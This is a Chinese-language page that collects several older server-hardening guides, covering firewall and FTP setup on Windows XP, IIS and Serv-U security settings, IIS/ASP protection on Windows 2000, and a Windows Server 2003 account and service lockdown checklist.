ＸＰ系统，自带了“Ｉｎｔｅｒｎｅｔ连接防火墙”功能，与ＴＣＰ／ＩＰ筛选功能相比，设置更方便，功能更强大。除了自带防火墙端口开放规则外，还可以自行增删。在控制面板中打开“网络连接”，右击拨号连接，进入“高级”选项卡，选中“通过限制或阻止来自Ｉｎｔｅｒｎｅｔ的对此计算机的访问来保护我的计算机和网络”，启用它。系统默认状态下是关闭了ＦＴＰ端口的，因而还要设置防火墙，打开所使用的ＦＴＰ端口。点击右下角的“设置”按钮进入“高级设置”，选中“ＦＴＰ服务器”，编辑它。由于ＦＴＰ服务默认端口是２１，因而除了ＩＰ地址一栏外，其余均不可更改。在ＩＰ地址一栏中填入服务器公网ＩＰ，确定后退出即可即时生效。如果架设的ＦＴＰ服务器端口为其他端口，比如２２，则可以在“服务”选项卡下方点“添加”，输入服务器名称和公网ＩＰ后，将外部端口号和内部端口号均填入２２即可。 三、对ＩＩＳ、Ｓｅｒｖ－Ｕ等服务器软件进行设置 除了依靠系统提供的安全措施外，就需要利用ＦＴＰ服务器端软件本身的设置来提高整个服务器的安全了。 １．ＩＩＳ的安全性设置 １）及时安装新补丁 对于ＩＩＳ的安全性漏洞，可以说是“有口皆碑”了，平均每两三个月就要出一两个漏洞。所幸的是，微软会根据新发现的漏洞提供相应的补丁，这就需要你不断更新，安装最新补丁。 ２）将安装目录设置到非系统盘，关闭不需要的服务 一些恶意用户可以通过ＩＩＳ的溢出漏洞获得对系统的访问权。把ＩＩＳ安放在系统分区上，会使系统文件与ＩＩＳ同样面临非法访问，容易使非法用户侵入系统分区。另外，由于ＩＩＳ是一个综合性服务组件，每开设一个服务都将会降低整个服务的安全性，因而，对不需要的服务尽量不要安装或启动。 ３）只允许匿名连接 ＦＴＰ最大的安全漏洞在于其默认传输密码的过程是明文传送，很容易被人嗅探到。而ＩＩＳ又是基于Ｗｉｎｄｏｗｓ用户账户进行管理的，因而很容易泄漏系统账户名及密码，如果该账户拥有一定管理权限，则更会影响到整个系统的安全。设置为“只允许匿名连接”，可以免却传输过程中泄密的危险。进入“默认ＦＴＰ站点”，在属性的“安全账户”选项卡中，将此选项选中。 ４）谨慎设置主目录及其权限 ＩＩＳ可以将ＦＴＰ站点主目录设为局域网中另一台计算机的共享目录，但在局域网中，共享目录很容易招致其他计算机感染的病毒攻击，严重时甚至会造成整个局域网瘫痪，不到万不得已，最好使用本地目录并将主目录设为ＮＴＦＳ格式的非系统分区中。这样，在对目录的权限设置时，可以对每个目录按不同组或用户来设置相应的权限。右击要设置的目录，进入“共享和安全→安全”中设置，如非必要，不要授予“写入”权限。 ５）尽量不要使用默认端口号２１ 启用日志记录，以备出现异常情况时查询原因。 ２．Ｓｅｒｖ－Ｕ的安全性设置 与ＩＩＳ的ＦＴＰ服务相比，Ｓｅｒｖ－Ｕ在安全性方面做得比较好。 １）对“本地服务器”进行设置 首先。选中“拦截ＦＴＰ＿ｂｏｕｎｃｅ攻击和ＦＸＰ”。什么是ＦＸＰ呢？通常，当使用ＦＴＰ协议进行文件传输时，客户端首先向ＦＴＰ服务器发出一个“ＰＯＲＴ”命令，该命令中包含此用户的ＩＰ地址和将被用来进行数据传输的端口号，服务器收到后，利用命令所提供的用户地址信息建立与用户的连接。大多数情况下，上述过程不会出现任何问题，但当客户端是一名恶意用户时，可能会通过在ＰＯＲＴ命令中加入特定的地址信息，使ＦＴＰ服务器与其它非客户端的机器建立连接。虽然这名恶意用户可能本身无权直接访问某一特定机器，但是如果ＦＴＰ服务器有权访问该机器的话，那么恶意用户就可以通过ＦＴＰ服务器作为中介，仍然能够最终实现与目标服务器的连接。这就是ＦＸＰ，也称跨服务器攻击。选中后就可以防止发生此种情况。 其次，在“高级”选项卡中，检查“加密密码”和“启用安全”是否被选中，如果没有，选择它们。“加密密码”使用单向ｈａｓｈ函数（ＭＤ５）加密用户口令，加密后的口令保存在ＳｅｒｖＵＤａｅｍｏｎ．ｉｎｉ或是注册表中。如果不选择此项，用户口令将以明文形式保存在文件中；“启用安全”将启动Ｓｅｒｖ－Ｕ服务器的安全成功。 ２）对域中的服务器进行设置 前面说过，ＦＴＰ默认为明文传送密码，容易被人嗅探，对于只拥有一般权限的账户，危险并不大，但如果该账户拥有远程管理尤其是系统管理员权限，则整个服务器都会被别人远程控制。Ｓｅｒｖ－Ｕ对每个账户的密码都提供了以下三种安全类型：规则密码、ＯＴＰ Ｓ／ＫＥＹ ＭＤ４和ＯＴＰ Ｓ／ＫＥＹ ＭＤ５。不同的类型对传输的加密方式也不同，以规则密码安全性最低。进入拥有一定管理权限的账户的设置中，在“常规”选项卡的下方找到“密码类型”下拉列表框，选中第二或第三种类型，保存即可。注意，当用户凭此账户登录服务器时，需要ＦＴＰ客户端软件支持此密码类型，如ＣｕｔｅＦＴＰ Ｐｒｏ等，输入密码时选择相应的密码类型方可通过服务器验证。 与ＩＩＳ一样，还要谨慎设置主目录及其权限，凡是没必要赋予写入等能修改服务器文件或目录权限的，尽量不要赋予。最后，进入“设置”，在“日志”选项卡中将“启用记录到文件”选中，并设置好日志文件名及保存路径、记录参数等，以方便随时查询服务器异常原因。 好了，开通你的ＦＴＰ吧。告诉大家：你当站长了。

配置 Windows Server 2003 – IIS 6 Microsoft Knowledge Base Article - 324742 这篇文章中的信息适用于: Microsoft Windows Server 2003, Datacenter Edition Microsoft Windows Server 2003, Enterprise Edition Microsoft Windows Server 2003, Standard Edition Microsoft Windows Server 2003, Web Edition Microsoft Windows Server 2003, 64-Bit Datacenter Edition Microsoft Windows Server 2003, 64-Bit Enterprise Edition Microsoft Internet Information Services version 6.0 本分步指南介绍了如何在 Windows Server 2003 环境中设置一个用于匿名访问的 WWW 服务器。 安装 Internet 信息服务 Microsoft Internet 信息服务 (IIS) 是与 Windows Server 2003 集成的 Web 服务。...

一. 前言 （仅以此文感谢好友bigeagle。不是他，我可能不用这么担心win2000安全问题的。呵呵！） 人说，一朝被蛇咬，十年怕…..，就是这样。2000年初，当我终于摆脱winnt 4.0 server那可怕的补丁之旅，迈向win2000 server时。我终于可以比较放心我的服务器了。但随着SQL SERVER的补丁出现。我知道，与微软的补丁因缘又开始轮回了。但还好。win2000自动化的管理还是让我放心好多，而以前管理winnt后的失眠症状也逐渐消失了。偶尔还能见到我的"梦"老弟。但这一切都伴随者同bigeagle的一次知心交谈中付之东流了。一次，bigeagle发来qq，给我看了一段代码。我一看就知道这不是bigeagle写的代码，那么烂，不过有点熟悉。再一看，啊？！这不是我的数据库连接字符串吗！！GOD。顿时觉得有一种不祥的预兆。不过还好，这个只是个access的，我还用了一些手段防止他被下载。但这足以让我长时间的失眠又来了。（再次说明，bigeagle不是蛇，他是鹰） 二. 安装过程中的IIS 与 ASP安全防护 （这里只考虑是Web服务器，而不是本地机子上的web开发平台。） 接下来的几天有是几个难熬的日子。我开始重新部署win2000 web服务器的安全策略。找到ASP代码被泄漏的原因。原来，我的补丁每次打得都比较及时的。但一次因为卸载FTP时，重装了IIS，而这之后，我并没有再打补丁而导致最新的漏洞web解析出错。（就是那个较新的漏洞 Translate :f， 用这个加上一些工具就可以看到ASP的代码了。） 首先，开始重装IIS。 这次安装的策略就是安全，够用。去掉一些多余的东西。 1. FTP不要安装了，功能不好，还容易出错，并且漏洞很大。Ftp缺省传输密码的过程可是明文传送，很容易被人截获。（可以考虑用第三方工具。） 2. 一切实例、文档也不要安装了。这是在web服务器上，最好不要这些例子，事实证明可以从这些例子站点突破IIS的防线的。 3. 安装时选择站点目录，建议不要用缺省目录c:\inetpub，最好安装道不是系统盘的盘上。如： d:\IISWEB，可以考虑自建目录。这样即使IIS被突破，也能尽可能的保护好系统文件了。 4. 不要安装html的远程管理。html的远程管理在winnt 4.0还能用的上，但漏洞比较大，而且比较危险，端口号虽然是随机的，但很容易被人扫描道，从而留下隐患。事实上，我们可以通过另一台服务器上的IIS来管理他。这样比较安全。 5. 多余的服务也不要安了，如NNtp，如果不做新闻组。就不要安了。smtp，如果有更好的邮件服务，也不要装它了。 6. 索引服务器。这个索引真的是很有用，但我没有用过他。否则，你可以用他建立个整个站点的文件搜索的，但现在好像大多数的ASP网页都是一个网页，动态从数据库里查询。所以根本用不上索引服务器了，（不是索引不好，而是本身上面的那种ASP文件结构就不适合）所以可以不要安装。 三. 有目的进行安全配置 ①、开发前的工作。 首先，启动IIS后，看有没有\iissamples,\IIShelp,\msadc,这些目录，如果有，他们大多是用来作为例子，帮助安装的，删掉他们，再把脚本库也删掉，直到web目录只留下干静的新建的虚拟目录即可。如果有管理的web站点，也删掉他。没有它，我们一样可以工作的更好。 还有看看有没有printer的文件夹，他们大多数都是些通过web来访问打印机的。MS就是怪。为了表示我的功力强大，允许通过web来远程打印。相信没有哪个网络公司是通过web网来打印的把。也不可能让网友来使用你的计算机吧。那好，去掉它。 然后。开始详细配置各个web虚拟目录的安全。大概的策略是这样的。分类每个文件夹管理，如可以把扩展名是相同的分配到同一目录，如*.ASP的，和*.inc就尽量分开。如果是*.ASP的，则开放虚拟目录权限，但将实际目录权限授予administrator,system(完全控制)everyone (rc)即可。这样可以通过web允许读取。但实际上你可以加大安全力度，如果你认为它是比较保密的。如果是*.inc的，则开放目录权限，但不允许通过直接访问。这里又一个技巧了。比如，你可以允许实际目录被everyone访问，但在IIS中，你把改目录浏览项去掉，而包含文件只能被源文件读取，但不允许被直接读取。这样，黑客就不可能下载到你的单机数据库了，而且你的*.inc文件也不会被浏览器直接阅读。 刚才我的老弟"梦"还在问我，有没有办法可以让别人看不到你的连接字符串，你可以试试下面的方法！ 1 首先建立连接字符串，并建立一个单独的文件*.inc（要是*.inc的，不要*.ASP的）你把你的连接字符串用变量复制进来。 如：connstr=““Provider=SQLOLEDB.1;Password=passw;………………..” 2 然后建立一个文件夹include，放在根目录里。 3 然后每一个文件用下面的办法打开连接。 如： set conn=server.createobject(“adodb.connection”) conn.open connstr 4 最后在iis里把include 文件夹用拒绝读的方法保护起来。你会发现，你的连接可以照常打开，但是如果对方看到你的源代码，他也看不到连接字符串，即使他看到了包含文件路径及名称。他也无法下载，或是用ie 打开。所以，可以保护你的连接字符串了。 这里用的方法是NT权限与 IIS权限的共同审核。我们知道，为了让用户从web上访问道服务器的文件，每个安装了IIS后的服务器都会有两个内置账号。I_USExxxxxx，I_WAMxxxxxx（x为你的机器名），这样你就可以有的放矢地预防某些从你的web网络查看你的必要信息的用户了。 当然，还有一些比较好的文件策略你可以参考一下： 如：CGI (.exe, .dll, .cmd, .pl)Everyone (X)不允许读，只能运行。Administrators（完全控制）System（完全控制）。 所以，你在编写ASP应用程序时，尽量归类好你的目录。方便用IIS和NT进行管理。 如，采用下列结构比较好 d:\web\ASPtest\static (放置*....

Win2003 Server的安全性较之Win2K确实有了很大的提高，但是用Win2003 Server作为服务器是否就真的安全了?如何才能打造一个安全的个人Web服务器?下面我们简单介绍一下…… 一、Windows Server2003的安装 1、安装系统最少两需要个分区，分区格式都采用NTFS格式 2、在断开网络的情况安装好2003系统 3、安装IIS，仅安装必要的 IIS 组件(禁用不需要的如FTP 和 SMTP 服务)。默认情况下，IIS服务没有安装，在添加/删除Win组件中选择“应用程序服务器”，然后点击“详细信息”，双击Internet信息服务(iis)，勾选以下选项: Internet 信息服务管理器; 公用文件; 后台智能传输服务 (BITS) 服务器扩展; 万维网服务。 如果你使用 FrontPage 扩展的 Web 站点再勾选:FrontPage 2002 Server Extensions 4、安装MSSQL及其它所需要的软件然后进行Update。 5、使用Microsoft 提供的 MBSA(Microsoft Baseline Security Analyzer) 工具分析计算机的安全配置，并标识缺少的修补程序和更新。下载地址:见页末的链接 二、设置和管理账户 1、系统管理员账户最好少建，更改默认的管理员帐户名(Administrator)和描述，密码最好采用数字加大小写字母加数字的上档键组合，长度最好不少于14位。 2、新建一个名为Administrator的陷阱帐号，为其设置最小的权限，然后随便输入组合的最好不低于20位的密码 3、将Guest账户禁用并更改名称和描述，然后输入一个复杂的密码，当然现在也有一个DelGuest的工具，也许你也可以利用它来删除Guest账户，但我没有试过。 4、在运行中输入gpedit.msc回车，打开组策略编辑器，选择计算机配置-Windows设置-安全设置-账户策略-账户锁定策略，将账户设为“三次登陆无效”，“锁定时间为30分钟”，“复位锁定计数设为30分钟”。 5、在安全设置-本地策略-安全选项中将“不显示上次的用户名”设为启用 6、在安全设置-本地策略-用户权利分配中将“从网络访问此计算机”中只保留Internet来宾账户、启动IIS进程账户。如果你使用了Asp.net还要保留Aspnet账户。 7、创建一个User账户，运行系统，如果要运行特权命令使用Runas命令。 三、网络服务安全管理 1、禁止C$、D$、ADMIN$一类的缺省共享 打开注册表，HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters，在右边的窗口中新建Dword值，名称设为AutoShareServer值设为0 2、 解除NetBios与TCP/IP协议的绑定 右击网上邻居-属性-右击本地连接-属性-双击Internet协议-高级-Wins-禁用TCP/IP上的NETBIOS 3、关闭不需要的服务，以下为建议选项 Computer Browser:维护网络计算机更新，禁用 Distributed File System: 局域网管理共享文件，不需要禁用 Distributed linktracking client:用于局域网更新连接信息，不需要禁用 Error reporting service:禁止发送错误报告 Microsoft Serch:提供快速的单词搜索，不需要可禁用 NTLMSecuritysupportprovide:telnet服务和Microsoft Serch用的，不需要禁用 PrintSpooler:如果没有打印机可禁用 Remote Registry:禁止远程修改注册表...